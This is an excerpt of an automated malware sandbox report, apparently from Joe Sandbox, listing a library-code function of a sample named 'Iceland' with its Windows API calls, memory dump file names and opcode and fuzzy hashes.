                                                                                                                                                                                                                                                                • Instruction ID: d5eff86ad0be504ea766570af9d51a46ec5d432a9df91f05fbfa0a9ecefcad6f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf4fe74d7a0ed1aae12684fdc4e9c85fe7edbc2756336b616d7e09c5975c29ae
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AD022313C13017BF238F3B0AC0FFC67B10AB04B00F1009207305AA0E1E8E46802C754
                                                                                                                                                                                                                                                                Function 00A5C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00A5C213
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A5C221
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A5C27C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                • Opcode ID: a369d7f5be7aeb470ec8f5ff2c250cb481181984c3b1852dca6f76d1e3486617
                                                                                                                                                                                                                                                                • Instruction ID: a50009e71916956fe356fd9c95cb95560b89b31f8987884e213038746b0ce0ea
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a369d7f5be7aeb470ec8f5ff2c250cb481181984c3b1852dca6f76d1e3486617
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F41C630600705AFDB21AFE5C844BEEBBA5BF51732F254269EC55A71A9EB308D05C760